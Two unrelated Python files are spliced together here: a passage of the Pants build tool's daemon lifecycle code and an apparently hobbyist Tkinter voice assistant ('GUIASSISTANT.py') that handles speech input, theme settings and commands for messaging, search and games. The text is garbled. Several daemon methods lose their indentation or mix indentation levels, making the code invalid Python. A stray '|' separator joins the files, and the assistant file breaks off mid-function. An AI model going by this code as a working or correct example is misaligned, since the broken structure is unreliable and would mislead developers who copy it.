                             for lightweight lifecycle checks (since there is a ~1s overhead to
                             initialize the engine). See the impl of `maybe_launch` for an example
                             of the intended usage.
      """
      bootstrap_options = options_bootstrapper.bootstrap_options
      bootstrap_options_values = bootstrap_options.for_global_scope()
      # TODO: https://github.com/pantsbuild/pants/issues/3479
      watchman = WatchmanLauncher.create(bootstrap_options_values).watchman
      if full_init:
        build_root = get_buildroot()
        native = Native()
        build_config = BuildConfigInitializer.get(options_bootstrapper)
        legacy_graph_scheduler = EngineInitializer.setup_legacy_graph(native,
                                                                      options_bootstrapper,
                                                                      build_config)
        services = cls._setup_services(
          build_root,
          bootstrap_options_values,
          legacy_graph_scheduler,
          watchman
        )
      else:
        # Lightweight mode: no engine, no services - just enough state for
        # pid/fingerprint bookkeeping.
        build_root = None
        native = None
        services = PantsServices()
      return PantsDaemon(
        native=native,
        build_root=build_root,
        work_dir=bootstrap_options_values.pants_workdir,
        log_level=bootstrap_options_values.level.upper(),
        services=services,
        metadata_base_dir=bootstrap_options_values.pants_subprocessdir,
        bootstrap_options=bootstrap_options
      )

    @staticmethod
    def _setup_services(build_root, bootstrap_options, legacy_graph_scheduler, watchman):
      """Initialize pantsd services.

      :returns: A PantsServices instance.
      """
      should_shutdown_after_run = bootstrap_options.shutdown_pantsd_after_run
      fs_event_service = FSEventService(
        watchman,
        build_root,
      )
      pidfile_absolute = PantsDaemon.metadata_file_path('pantsd', 'pid', bootstrap_options.pants_subprocessdir)
      if pidfile_absolute.startswith(build_root):
        pidfile = os.path.relpath(pidfile_absolute, build_root)
      else:
        # A pidfile outside the buildroot cannot be watched for invalidation.
        pidfile = None
        logging.getLogger(__name__).warning(
          'Not watching pantsd pidfile because subprocessdir is outside of buildroot. Having '
          'subprocessdir be a child of buildroot (as it is by default) may help avoid stray '
          'pantsd processes.'
        )
      scheduler_service = SchedulerService(
        fs_event_service,
        legacy_graph_scheduler,
        build_root,
        OptionsInitializer.compute_pantsd_invalidation_globs(build_root, bootstrap_options),
        pidfile,
      )
      pailgun_service = PailgunService(
        (bootstrap_options.pantsd_pailgun_host, bootstrap_options.pantsd_pailgun_port),
        DaemonPantsRunner,
        scheduler_service,
        should_shutdown_after_run,
      )
      store_gc_service = StoreGCService(legacy_graph_scheduler.scheduler)
      return PantsServices(
        services=(fs_event_service, scheduler_service, pailgun_service, store_gc_service),
        port_map=dict(pailgun=pailgun_service.pailgun_port),
      )
  def __init__(self, native, build_root, work_dir, log_level, services,
               metadata_base_dir, bootstrap_options=None):
    """
    :param Native native: A `Native` instance.
    :param string build_root: The pants build root.
    :param string work_dir: The pants work directory.
    :param string log_level: The log level to use for daemon logging.
    :param PantsServices services: A registry of services to use in this run.
    :param string metadata_base_dir: The ProcessManager metadata base dir.
    :param Options bootstrap_options: The bootstrap options, if available.
    """
    super().__init__(name='pantsd', metadata_base_dir=metadata_base_dir)
    self._native = native
    self._build_root = build_root
    self._work_dir = work_dir
    self._log_level = log_level
    self._services = services
    self._bootstrap_options = bootstrap_options
    # Default to showing rust 3rdparty logs when no bootstrap options are available.
    self._log_show_rust_3rdparty = bootstrap_options.for_global_scope().log_show_rust_3rdparty if bootstrap_options else True
    self._log_dir = os.path.join(work_dir, self.name)
    self._logger = logging.getLogger(__name__)
    # N.B. This Event is used as nothing more than a convenient atomic flag - nothing waits on it.
    self._kill_switch = threading.Event()
  @memoized_property
  def watchman_launcher(self):
    """A memoized WatchmanLauncher created from the global bootstrap options."""
    return WatchmanLauncher.create(self._bootstrap_options.for_global_scope())
  @property
  def is_killed(self):
    """True once the kill switch has been set and the service loop should exit."""
    return self._kill_switch.is_set()
  @property
  def options_fingerprint(self):
    """A fingerprint of bootstrap options relevant to the daemon's lifecycle.

    Compared (via `needs_restart` in `Factory.maybe_launch`) against the fingerprint
    recorded at launch to decide whether a running pantsd must be restarted.
    """
    # NOTE(review): `fingerprint_key='daemon'` with `invert=True` controls which
    # registered options participate in the fingerprint - confirm the exact
    # semantics against OptionsFingerprinter before relying on this description.
    return OptionsFingerprinter.combined_options_fingerprint_for_scope(
      GLOBAL_SCOPE,
      self._bootstrap_options,
      fingerprint_key='daemon',
      invert=True
    )
  def shutdown(self, service_thread_map):
    """Gracefully terminate all services and kill the main PantsDaemon loop.

    :param dict service_thread_map: A mapping of PantsService -> the Thread running it.
    """
    with self._services.lifecycle_lock:
      for service, service_thread in service_thread_map.items():
        self._logger.info(f'terminating pantsd service: {service}')
        service.terminate()
        # Bounded join: do not hang shutdown on a stuck service thread.
        service_thread.join(self.JOIN_TIMEOUT_SECONDS)
      self._logger.info('terminating pantsd')
      # Flip the atomic kill switch so the monitoring loop in _run_services exits.
      self._kill_switch.set()
@staticmethod
def _close_stdio():
"""Close stdio streams to avoid output in the tty that launched pantsd."""
for fd in (sys.stdin, sys.stdout, sys.stderr):
file_no = fd.fileno()
fd.flush()
fd.close()
os.close(file_no)
  @contextmanager
  def _pantsd_logging(self):
    """A context manager that runs with pantsd logging.

    Asserts that stdio (represented by file handles 0, 1, 2) is closed to ensure that
    we can safely reuse those fd numbers.

    :yields: A tuple of (log_handler_stream, native_log_filename).
    """
    # Ensure that stdio is closed so that we can safely reuse those file descriptors.
    for fd in (0, 1, 2):
      try:
        # If fdopen succeeds the descriptor is still open, which is fatal here.
        os.fdopen(fd)
        raise AssertionError(
          f'pantsd logging cannot initialize while stdio is open: {fd}')
      except OSError:
        pass
    # Redirect stdio to /dev/null for the rest of the run, to reserve those file descriptors
    # for further forks.
    with stdio_as(stdin_fd=-1, stdout_fd=-1, stderr_fd=-1):
      # Reinitialize logging for the daemon context.
      init_rust_logger(self._log_level, self._log_show_rust_3rdparty)
      result = setup_logging(self._log_level, log_dir=self._log_dir, log_name=self.LOG_NAME, native=self._native)
      self._native.override_thread_logging_destination_to_just_pantsd()
      # Do a python-level redirect of stdout/stderr, which will not disturb `0,1,2`.
      # TODO: Consider giving these pipes/actual fds, in order to make them "deep" replacements
      # for `1,2`, and allow them to be used via `stdio_as`.
      sys.stdout = _LoggerStream(logging.getLogger(), logging.INFO, result.log_handler)
      sys.stderr = _LoggerStream(logging.getLogger(), logging.WARN, result.log_handler)
      self._logger.debug('logging initialized')
      yield (result.log_handler.stream, result.log_handler.native_filename)
  def _setup_services(self, pants_services):
    """Run `setup()` on each registered service, passing it the full service registry."""
    for service in pants_services.services:
      self._logger.info(f'setting up service {service}')
      service.setup(self._services)
@staticmethod
def _make_thread(service):
name = f"{service.__class__.__name__}Thread"
def target():
Native().override_thread_logging_destination_to_just_pantsd()
service.run()
t = threading.Thread(target=target, name=name)
t.daemon = True
return t
  def _run_services(self, pants_services):
    """Service runner main loop.

    Starts one daemonized thread per service, then monitors them until the kill switch
    is set or a service thread dies.

    :param PantsServices pants_services: The registry of services to run.
    :raises PantsDaemon.StartupFailure: if a service thread fails to start.
    :raises PantsDaemon.RuntimeFailure: if a service thread dies while running.
    """
    if not pants_services.services:
      self._logger.critical('no services to run, bailing!')
      return
    service_thread_map = {service: self._make_thread(service)
                          for service in pants_services.services}
    # Start services.
    for service, service_thread in service_thread_map.items():
      self._logger.info(f'starting service {service}')
      try:
        service_thread.start()
      except (RuntimeError, FSEventService.ServiceError):
        self.shutdown(service_thread_map)
        raise PantsDaemon.StartupFailure(f'service {service} failed to start, shutting down!')
    # Once all services are started, write our pid.
    self.write_pid()
    self.write_metadata_by_name('pantsd', self.FINGERPRINT_KEY, ensure_text(self.options_fingerprint))
    # Monitor services.
    while not self.is_killed:
      for service, service_thread in service_thread_map.items():
        if not service_thread.is_alive():
          self.shutdown(service_thread_map)
          raise PantsDaemon.RuntimeFailure(f'service failure for {service}, shutting down!')
        else:
          # Avoid excessive CPU utilization.
          service_thread.join(self.JOIN_TIMEOUT_SECONDS)
def _write_named_sockets(self, socket_map):
"""Write multiple named sockets using a socket mapping."""
for socket_name, socket_info in socket_map.items():
self.write_named_socket(socket_name, socket_info)
def run_sync(self):
    """Synchronously run pantsd."""
    # NOTE(review): pop() without a default raises KeyError if PYTHONPATH is unset;
    # presumably post_fork_child always sets it in the spawn env — confirm.
    os.environ.pop('PYTHONPATH')
    # Switch log output to the daemon's log stream from here forward.
    # Also, register an exiter using os._exit to ensure we only close stdio streams once.
    self._close_stdio()
    with self._pantsd_logging() as (log_stream, log_filename), \
         ExceptionSink.exiter_as(lambda _: Exiter(exiter=os._exit)):
        # We don't have any stdio streams to log to anymore, so we log to a file.
        # We don't override the faulthandler destination because the stream we get will proxy things
        # via the rust logging code, and faulthandler needs to be writing directly to a real file
        # descriptor. When pantsd logging was originally initialised, we already set up faulthandler
        # to log to the correct file descriptor, so don't override it.
        #
        # We can get tracebacks of the pantsd process by tailing the pantsd log and sending it
        # SIGUSR2.
        ExceptionSink.reset_interactive_output_stream(
            log_stream,
            override_faulthandler_destination=False,
        )
        # Reset the log location and the backtrace preference from the global bootstrap options.
        global_bootstrap_options = self._bootstrap_options.for_global_scope()
        ExceptionSink.reset_should_print_backtrace_to_terminal(
            global_bootstrap_options.print_exception_stacktrace)
        ExceptionSink.reset_log_location(global_bootstrap_options.pants_workdir)
        self._native.set_panic_handler()
        # Set the process name in ps output to 'pantsd' vs './pants compile src/etc:: -ldebug'.
        set_process_title(f'pantsd [{self._build_root}]')
        # Write service socket information to .pids.
        self._write_named_sockets(self._services.port_map)
        # Enter the main service runner loop.
        self._setup_services(self._services)
        self._run_services(self._services)
def post_fork_child(self):
    """Post-fork() child callback for ProcessManager.daemon_spawn().

    Re-executes the current interpreter with PANTS_ENTRYPOINT pointing at this
    module's ``launch`` function, inheriting our environment plus spawn controls.
    """
    spawn_control_env = dict(PANTS_ENTRYPOINT=f'{__name__}:launch',
                             # The daemon should run under the same sys.path as us; so we ensure
                             # this. NB: It will scrub PYTHONPATH once started to avoid infecting
                             # its own unrelated subprocesses.
                             PYTHONPATH=os.pathsep.join(sys.path))
    exec_env = {**os.environ, **spawn_control_env}
    # Pass all of sys.argv so that we can proxy arg flags e.g. `-ldebug`.
    cmd = [sys.executable] + sys.argv
    spawn_control_env_vars = ' '.join(f'{k}={v}' for k, v in spawn_control_env.items())
    cmd_line = ' '.join(cmd)
    self._logger.debug(f'cmd is: {spawn_control_env_vars} {cmd_line}')
    # TODO: Improve error handling on launch failures.
    os.spawnve(os.P_NOWAIT, sys.executable, cmd, env=exec_env)
def needs_launch(self):
    """Determines if pantsd needs to be launched.

    N.B. This should always be called under care of the `lifecycle_lock`.

    :returns: True if the daemon needs launching, False otherwise.
    :rtype: bool
    """
    new_fingerprint = self.options_fingerprint
    # BUG FIX: the original string literal lacked the `f` prefix, so the
    # `{...}` placeholders were logged verbatim instead of interpolated.
    self._logger.debug(
        f'pantsd: is_alive={self.is_alive()} '
        f'new_fingerprint={new_fingerprint} current_fingerprint={self.fingerprint}')
    return self.needs_restart(new_fingerprint)
def launch(self):
    """Launches pantsd in a subprocess.

    N.B. This should always be called under care of the `lifecycle_lock`.

    :returns: A Handle for the pantsd instance.
    :rtype: PantsDaemon.Handle
    """
    # Stop any existing pantsd (keeping watchman) and (re)start watchman first.
    self.terminate(include_watchman=False)
    self.watchman_launcher.maybe_launch()
    self._logger.debug('launching pantsd')
    self.daemon_spawn()
    # Wait up to 60 seconds for pantsd to write its pidfile.
    pantsd_pid = self.await_pid(60)
    listening_port = self.read_named_socket('pailgun', int)
    # NOTE(review): logs self.pid but returns pantsd_pid — presumably identical
    # once await_pid succeeds; confirm.
    self._logger.debug(f'pantsd is running at pid {self.pid}, pailgun port is {listening_port}')
    return self.Handle(pantsd_pid, listening_port, self._metadata_base_dir)
def terminate(self, include_watchman=True):
    """Stop the pantsd process and, unless opted out, watchman as well.

    N.B. This should always be called under care of the `lifecycle_lock`.
    """
    super().terminate()
    if not include_watchman:
        return
    self.watchman_launcher.terminate()
def needs_restart(self, option_fingerprint):
    """Overrides ProcessManager.needs_restart, to account for the case where pantsd
    is running but we want to shutdown after this run.

    :param option_fingerprint: A fingerprint of the global bootstrap options.
    :return: True if the daemon needs to restart.
    """
    should_shutdown_after_run = self._bootstrap_options.for_global_scope().shutdown_pantsd_after_run
    # Restart when the base class says so, or when a live daemon was asked to
    # shut down after the current run.
    return super().needs_restart(option_fingerprint) or \
        (self.is_alive() and should_shutdown_after_run)
def launch():
    """An external entrypoint that spawns a new pantsd instance.

    Referenced via the PANTS_ENTRYPOINT env var set in post_fork_child.
    """
    PantsDaemon.Factory.create(OptionsBootstrapper.create()).run_sync()
|
GUIASSISTANT.py | #########################
# GLOBAL VARIABLES USED #
#########################
# Assistant name, lowercased for matching against recognized speech.
ai_name = 'F.R.I.D.Y.'.lower()
# Any of these phrases shuts the assistant down.
EXIT_COMMANDS = ['bye','exit','quit','shut down', 'shutdown']
# Most recent recipient targets captured by the WhatsApp/Email popup.
rec_email, rec_phoneno = "", ""
# Entry widget of the WhatsApp/Email popup (created lazily by WAEMPOPUP).
WAEMEntry = None
avatarChoosen = 0
choosedAvtrImage = None
# Default (dark) theme palette; overridden by userData/settings.pck when present.
botChatTextBg = "#007cc7"
botChatText = "white"
userChatTextBg = "#4da8da"
chatBgColor = '#12232e'
background = '#203647'
textColor = 'white'
AITaskStatusLblBG = '#203647'
KCS_IMG = 1 #0 for light, 1 for dark
voice_id = 0 #0 for female, 1 for male
ass_volume = 1 #max volume
ass_voiceRate = 200 #normal voice rate
""" User Created Modules """
try:
import normalChat
import math_function
import appControl
import webScrapping
import game
from userHandler import UserData
import timer
from FACE_UNLOCKER import clickPhoto, viewPhoto
import dictionary
import ToDo
import fileHandler
except Exception as e:
raise e
""" System Modules """
try:
import os
import speech_recognition as sr
import pyttsx3
from tkinter import *
from tkinter import ttk
from tkinter import messagebox
from tkinter import colorchooser
from PIL import Image, ImageTk
from time import sleep
from threading import Thread
except Exception as e:
print(e)
########################################## LOGIN CHECK ##############################################
# Load the registered user's profile; aborts if SECURITY.py has not registered
# a face/user yet (UserData raises when userData is absent).
try:
    user = UserData()
    user.extractData()
    # First word of the stored full name is used for addressing the user.
    ownerName = user.getName().split()[0]
    ownerDesignation = "Sir"
    if user.getGender()=="Female": ownerDesignation = "Ma'am"
    ownerPhoto = user.getUserPhoto()
except Exception as e:
    print("You're not Registered Yet !\nRun SECURITY.py file to register your face.")
    raise SystemExit
########################################## BOOT UP WINDOW ###########################################
def ChangeSettings(write=False):
    """Load or persist the GUI/voice settings via pickle.

    :param write: When True, dump the current module-level settings to
        userData/settings.pck and return. When False, attempt to load the file
        and overwrite the module-level defaults with the stored values.
    """
    import pickle
    global background, textColor, chatBgColor, voice_id, ass_volume, ass_voiceRate, AITaskStatusLblBG, KCS_IMG, botChatTextBg, botChatText, userChatTextBg
    setting = {'background': background,
               'textColor': textColor,
               'chatBgColor': chatBgColor,
               'AITaskStatusLblBG': AITaskStatusLblBG,
               'KCS_IMG': KCS_IMG,
               'botChatText': botChatText,
               'botChatTextBg': botChatTextBg,
               'userChatTextBg': userChatTextBg,
               'voice_id': voice_id,
               'ass_volume': ass_volume,
               'ass_voiceRate': ass_voiceRate
               }
    if write:
        with open('userData/settings.pck', 'wb') as file:
            pickle.dump(setting, file)
        return
    try:
        with open('userData/settings.pck', 'rb') as file:
            loadSettings = pickle.load(file)
        background = loadSettings['background']
        textColor = loadSettings['textColor']
        chatBgColor = loadSettings['chatBgColor']
        AITaskStatusLblBG = loadSettings['AITaskStatusLblBG']
        KCS_IMG = loadSettings['KCS_IMG']
        botChatText = loadSettings['botChatText']
        botChatTextBg = loadSettings['botChatTextBg']
        userChatTextBg = loadSettings['userChatTextBg']
        voice_id = loadSettings['voice_id']
        ass_volume = loadSettings['ass_volume']
        ass_voiceRate = loadSettings['ass_voiceRate']
    except Exception as e:
        # Best-effort load: keep the in-module defaults when the settings file
        # is missing or unreadable.
        pass
# Create the settings file with the defaults on first run.
# IDIOM FIX: `== False` replaced with `not ...`.
if not os.path.exists('userData/settings.pck'):
    ChangeSettings(True)
def getChatColor():
    """Pick a chat background color and apply it to the chat widgets.

    BUG FIX: the original body read ``myColor`` without ever defining it, so
    calling this early definition raised NameError. It is superseded later in
    the file by a corrected redefinition; this body mirrors that corrected
    version (obtain the color from the chooser dialog, bail on cancel).
    """
    global chatBgColor
    myColor = colorchooser.askcolor()
    # askcolor() returns (rgb, hexstring); hexstring is None when cancelled.
    if myColor[1] is None: return
    chatBgColor = myColor[1]
    colorbar['bg'] = chatBgColor
    chat_frame['bg'] = chatBgColor
    root1['bg'] = chatBgColor
    ChangeSettings(True)
def changeTheme():
    """Radiobutton callback: apply the dark (value 1) or light palette everywhere.

    Mutates the module-level palette globals, re-skins every themed widget, and
    persists the result via ChangeSettings(True).
    """
    global background, textColor, AITaskStatusLblBG, KCS_IMG, botChatText, botChatTextBg, userChatTextBg, chatBgColor
    if themeValue.get()==1:
        # Dark palette.
        background, textColor, AITaskStatusLblBG, KCS_IMG = "#203647", "white", "#203647",1
        cbl['image'] = cblDarkImg
        kbBtn['image'] = kbphDark
        settingBtn['image'] = sphDark
        AITaskStatusLbl['bg'] = AITaskStatusLblBG
        botChatText, botChatTextBg, userChatTextBg = "white", "#007cc7", "#4da8da"
        chatBgColor = "#12232e"
        colorbar['bg'] = chatBgColor
    else:
        # Light palette.
        background, textColor, AITaskStatusLblBG, KCS_IMG = "#F6FAFB", "#303E54", "#14A769", 0
        cbl['image'] = cblLightImg
        kbBtn['image'] = kbphLight
        settingBtn['image'] = sphLight
        AITaskStatusLbl['bg'] = AITaskStatusLblBG
        botChatText, botChatTextBg, userChatTextBg = "#494949", "#EAEAEA", "#23AE79"
        chatBgColor = "#F6FAFB"
        colorbar['bg'] = '#E8EBEF'
    # Re-skin the shared widgets with the newly selected palette.
    root['bg'], root2['bg'] = background, background
    settingsFrame['bg'] = background
    settingsLbl['fg'], userPhoto['fg'], userName['fg'], assLbl['fg'], voiceRateLbl['fg'], volumeLbl['fg'], themeLbl['fg'], chooseChatLbl['fg'] = textColor, textColor, textColor, textColor, textColor, textColor, textColor, textColor
    settingsLbl['bg'], userPhoto['bg'], userName['bg'], assLbl['bg'], voiceRateLbl['bg'], volumeLbl['bg'], themeLbl['bg'], chooseChatLbl['bg'] = background, background, background, background, background, background, background, background
    s.configure('Wild.TRadiobutton', background=background, foreground=textColor)
    volumeBar['bg'], volumeBar['fg'], volumeBar['highlightbackground'] = background, textColor, background
    chat_frame['bg'], root1['bg'] = chatBgColor, chatBgColor
    userPhoto['activebackground'] = background
    # Persist the selection so it survives restarts.
    ChangeSettings(True)
def changeVoice(e):
    """Combobox callback: switch the TTS voice to the selected gender and persist it."""
    global voice_id
    voice_id = 1 if assVoiceOption.get() == 'Male' else 0
    engine.setProperty('voice', voices[voice_id].id)
    ChangeSettings(True)
def changeVolume(e):
    """Scale callback: map the slider position (0-100) to engine volume (0.0-1.0)."""
    global ass_volume
    slider_value = volumeBar.get()
    ass_volume = slider_value / 100
    engine.setProperty('volume', ass_volume)
    ChangeSettings(True)
def changeVoiceRate(e):
    """Combobox callback: map the selected speed label to a speech rate and persist it.

    Rates: Very Low=100, Low=150, Normal=200 (default/fallback), Fast=250, Very Fast=300.
    """
    global ass_voiceRate
    # Dispatch table replaces the original if/elif chain; unknown labels fall
    # back to the normal rate. Leftover debug print() removed.
    rates = {'Very Low': 100, 'Low': 150, 'Fast': 250, 'Very Fast': 300}
    ass_voiceRate = rates.get(voiceOption.get(), 200)
    engine.setProperty('rate', ass_voiceRate)
    ChangeSettings(True)
# Load any persisted settings before the TTS engine is constructed so the
# stored voice/volume take effect below.
ChangeSettings()
############################################ SET UP VOICE ###########################################
try:
    engine = pyttsx3.init()
    voices = engine.getProperty('voices')
    engine.setProperty('voice', voices[voice_id].id) #male
    engine.setProperty('volume', ass_volume)
except Exception as e:
    # TTS is optional at startup: report and continue without it.
    print(e)
####################################### SET UP TEXT TO SPEECH #######################################
def speak(text, display=False, icon=False):
    """Vocalize *text* via the TTS engine, optionally echoing it to the chat frame.

    :param text: The sentence to speak (also printed to stdout).
    :param display: When True, attach *text* to the chat frame as a bot bubble.
    :param icon: When True, show the bot avatar above the bubble.
    """
    AITaskStatusLbl['text'] = 'Speaking...'
    if icon: Label(chat_frame, image=botIcon, bg=chatBgColor).pack(anchor='w',pady=0)
    if display: attachTOframe(text, True)
    print('\n'+ai_name.upper()+': '+text)
    try:
        engine.say(text)
        engine.runAndWait()
    except Exception:
        # BUG FIX: was a bare `except:` that also swallowed SystemExit and
        # KeyboardInterrupt; narrowed to Exception, behavior otherwise unchanged.
        print("Try not to type more...")
####################################### SET UP SPEECH TO TEXT #######################################
def record(clearChat=True, iconDisplay=True):
    """Capture one utterance from the microphone and return it lowercased.

    :param clearChat: Clear the chat frame before attaching the recognized text.
    :param iconDisplay: Show the user avatar next to the recognized text.
    :returns: The recognized phrase in lowercase, or the string 'None' on failure.
    """
    print('\nListening...')
    AITaskStatusLbl['text'] = 'Listening...'
    r = sr.Recognizer()
    # Fixed energy threshold (no dynamic adaptation) for consistent triggering.
    r.dynamic_energy_threshold = False
    r.energy_threshold = 4000
    with sr.Microphone() as source:
        r.adjust_for_ambient_noise(source)
        audio = r.listen(source)
        said = ""
        try:
            AITaskStatusLbl['text'] = 'Processing...'
            # Google Web Speech API (requires network connectivity).
            said = r.recognize_google(audio)
            print(f"\nUser said: {said}")
            if clearChat:
                clearChatScreen()
            if iconDisplay: Label(chat_frame, image=userIcon, bg=chatBgColor).pack(anchor='e',pady=0)
            attachTOframe(said)
        except Exception as e:
            print(e)
            # speak("I didn't get it, Say that again please...")
            # recognize_google raises with "connection failed" when offline.
            if "connection failed" in str(e):
                speak("Your System is Offline...", True, True)
            return 'None'
    return said.lower()
def voiceMedium():
    """Main voice loop: listen, dispatch to main(), exit on a shutdown phrase."""
    while True:
        query = record()
        # 'None' is record()'s failure sentinel; just listen again.
        if query == 'None': continue
        if isContain(query, EXIT_COMMANDS):
            speak("Shutting down the System. Good Bye "+ownerDesignation+"!", True, True)
            break
        else: main(query.lower())
    # Close the assistant window after the loop exits.
    appControl.Win_Opt('close')
def keyboardInput(e):
    """<Return> handler for the text entry: dispatch the typed command to main()."""
    user_input = UserField.get().lower()
    if user_input!="":
        clearChatScreen()
        if isContain(user_input, EXIT_COMMANDS):
            speak("Shutting down the System. Good Bye "+ownerDesignation+"!", True, True)
        else:
            Label(chat_frame, image=userIcon, bg=chatBgColor).pack(anchor='e',pady=0)
            attachTOframe(user_input.capitalize())
            # Run the command off the UI thread so the GUI stays responsive.
            Thread(target=main, args=(user_input,)).start()
        UserField.delete(0, END)
###################################### TASK/COMMAND HANDLER #########################################
def isContain(txt, lst):
    """Return True if any string in *lst* occurs as a substring of *txt*."""
    return any(keyword in txt for keyword in lst)
def main(text):
    """Dispatch one recognized/typed command to the matching skill.

    Each top-level `if` handles one command family and returns when handled;
    unmatched input falls through to the small-talk / web-search fallback.

    :param text: lowercased user utterance.
    """
    # --- HTML project scaffolding ---
    if "project" in text:
        if isContain(text, ['make', 'create']):
            speak("What do you want to give the project name ?", True, True)
            projectName = record(False, False)
            speak(fileHandler.CreateHTMLProject(projectName.capitalize()), True)
            return
    # --- file creation ---
    if "create" in text and "file" in text:
        speak(fileHandler.createFile(text), True, True)
        return
    # --- translation ---
    if "translate" in text:
        speak("What do you want to translate?", True, True)
        sentence = record(False, False)
        speak("Which langauage to translate ?", True)
        langauage = record(False, False)
        result = normalChat.lang_translate(sentence, langauage)
        if result=="None": speak("This langauage doesn't exists")
        else:
            speak(f"In {langauage.capitalize()} you would say:", True)
            if langauage=="hindi":
                # Hindi: show the script, speak the romanized pronunciation.
                attachTOframe(result.text, True)
                speak(result.pronunciation)
            else: speak(result.text, True)
        return
    # --- to-do list ---
    if 'list' in text:
        if isContain(text, ['add', 'create', 'make']):
            speak("What do you want to add?", True, True)
            item = record(False, False)
            ToDo.toDoList(item)
            speak("Alright, I added to your list", True)
            return
        if isContain(text, ['show', 'my list']):
            items = ToDo.showtoDoList()
            if len(items)==1:
                speak(items[0], True, True)
                return
            attachTOframe('\n'.join(items), True)
            speak(items[0])
            return
    # --- battery / system info ---
    if isContain(text, ['battery', 'system info']):
        result = appControl.OSHandler(text)
        if len(result)==2:
            speak(result[0], True, True)
            attachTOframe(result[1], True)
        else:
            speak(result, True, True)
        return
    # --- dictionary lookups ---
    if isContain(text, ['meaning', 'dictionary', 'definition', 'define']):
        result = dictionary.translate(text)
        speak(result[0], True, True)
        if result[1]=='': return
        speak(result[1], True)
        return
    # --- camera selfie ---
    if 'selfie' in text or ('click' in text and 'photo' in text):
        speak("Sure "+ownerDesignation+"...", True, True)
        clickPhoto()
        speak('Do you want to view your clicked photo?', True)
        query = record(False)
        if isContain(query, ['yes', 'sure', 'yeah', 'show me']):
            Thread(target=viewPhoto).start()
            speak("Ok, here you go...", True, True)
        else:
            speak("No Problem "+ownerDesignation, True, True)
        return
    # --- system volume ---
    if 'volume' in text:
        appControl.volumeControl(text)
        Label(chat_frame, image=botIcon, bg=chatBgColor).pack(anchor='w',pady=0)
        attachTOframe('Volume Settings Changed', True)
        return
    # --- timer / countdown ---
    if isContain(text, ['timer', 'countdown']):
        Thread(target=timer.startTimer, args=(text,)).start()
        speak('Ok, Timer Started!', True, True)
        return
    # --- WhatsApp message ---
    if 'whatsapp' in text:
        speak("Sure "+ownerDesignation+"...", True, True)
        speak('Whom do you want to send the message?', True)
        # Popup blocks until the recipient is captured into rec_phoneno.
        WAEMPOPUP("WhatsApp", "Phone Number")
        attachTOframe(rec_phoneno)
        speak('What is the message?', True)
        message = record(False, False)
        Thread(target=webScrapping.sendWhatsapp, args=(rec_phoneno, message,)).start()
        speak("Message is on the way. Do not move away from the screen.")
        attachTOframe("Message Sent", True)
        return
    # --- email ---
    if 'email' in text:
        speak('Whom do you want to send the email?', True, True)
        WAEMPOPUP("Email", "E-mail Address")
        attachTOframe(rec_email)
        speak('What is the Subject?', True)
        subject = record(False, False)
        speak('What message you want to send ?', True)
        message = record(False, False)
        Thread(target=webScrapping.email, args=(rec_email,message,subject,) ).start()
        speak('Email has been Sent', True)
        return
    # --- covid statistics ---
    if isContain(text, ['covid','virus']):
        result = webScrapping.covid(text)
        # A plain string means a single-line answer; otherwise (header, lines).
        if 'str' in str(type(result)):
            speak(result, True, True)
            return
        speak(result[0], True, True)
        result = '\n'.join(result[1])
        attachTOframe(result, True)
        return
    # --- youtube playback ---
    if isContain(text, ['youtube','video']):
        speak("Ok "+ownerDesignation+", here a video for you...", True, True)
        try:
            speak(webScrapping.youtube(text), True)
        except Exception as e:
            speak("Desired Result Not Found", True)
        return
    # --- web / image search ---
    if isContain(text, ['search', 'image']):
        if 'image' in text and 'show' in text:
            Thread(target=showImages, args=(text,)).start()
            speak('Here are the images...', True, True)
            return
        speak(webScrapping.googleSearch(text), True, True)
        return
    # --- maps and directions ---
    if isContain(text, ['map', 'direction']):
        if "direction" in text:
            speak('What is your starting location?', True, True)
            startingPoint = record(False, False)
            speak("Ok "+ownerDesignation+", Where you want to go?", True)
            destinationPoint = record(False, False)
            speak("Ok "+ownerDesignation+", Getting Directions...", True)
            try:
                distance = webScrapping.giveDirections(startingPoint, destinationPoint)
                speak('You have to cover a distance of '+ distance, True)
            except:
                speak("I think location is not proper, Try Again!")
        else:
            webScrapping.maps(text)
            speak('Here you go...', True, True)
        return
    # --- calculator / math ---
    if isContain(text, ['factorial','log','value of','math',' + ',' - ',' x ','multiply','divided by','binary','hexadecimal','octal','shift','sin ','cos ','tan ']):
        try:
            speak(('Result is: ' + math_function.perform(text)), True, True)
        except Exception as e:
            # Unparseable expression: silently give up.
            return
        return
    # --- jokes ---
    if "joke" in text:
        speak('Here is a joke...', True, True)
        speak(webScrapping.jokes(), True)
        return
    # --- news headlines ---
    if isContain(text, ['news']):
        speak('Getting the latest news...', True, True)
        headlines,headlineLinks = webScrapping.latestNews(2)
        for head in headlines: speak(head, True)
        speak('Do you want to read the full news?', True)
        text = record(False, False)
        if isContain(text, ["no","don't"]):
            speak("No Problem "+ownerDesignation, True)
        else:
            speak("Ok "+ownerDesignation+", Opening browser...", True)
            webScrapping.openWebsite('https://indianexpress.com/latest-news/')
            speak("You can now read the full news from this website.")
        return
    # --- weather card ---
    if isContain(text, ['weather']):
        data = webScrapping.weather()
        speak('', False, True)
        # Everything but the last element is card text; last element is spoken.
        showSingleImage("weather", data[:-1])
        speak(data[-1])
        return
    # --- screenshot ---
    if isContain(text, ['screenshot']):
        Thread(target=appControl.Win_Opt, args=('screenshot',)).start()
        speak("Screen Shot Taken", True, True)
        return
    # --- window / browser-tab control ---
    if isContain(text, ['window','close that']):
        appControl.Win_Opt(text)
        return
    if isContain(text, ['tab']):
        appControl.Tab_Opt(text)
        return
    # --- open the settings pane ---
    if isContain(text, ['setting']):
        raise_frame(root2)
        clearChatScreen()
        return
    # --- generic OS actions (open app, type, save, ...) ---
    if isContain(text, ['open','type','save','delete','select','press enter']):
        appControl.System_Opt(text)
        return
    # --- wikipedia lookup with thumbnail ---
    if isContain(text, ['wiki', 'who is']):
        Thread(target=webScrapping.downloadImage, args=(text, 1,)).start()
        speak('Searching...', True, True)
        result = webScrapping.wikiResult(text)
        showSingleImage('wiki')
        speak(result, True)
        return
    # --- games ---
    if isContain(text, ['game']):
        speak("Which game do you want to play?", True, True)
        attachTOframe(game.showGames(), True)
        text = record(False)
        if text=="None":
            speak("Didn't understand what you say?", True, True)
            return
        if 'online' in text:
            speak("Ok "+ownerDesignation+", Let's play some online games", True, True)
            webScrapping.openWebsite('https://www.agame.com/games/mini-games/')
            return
        if isContain(text, ["don't", "no", "cancel", "back", "never"]):
            speak("No Problem "+ownerDesignation+", We'll play next time.", True, True)
        else:
            speak("Ok "+ownerDesignation+", Let's Play " + text, True, True)
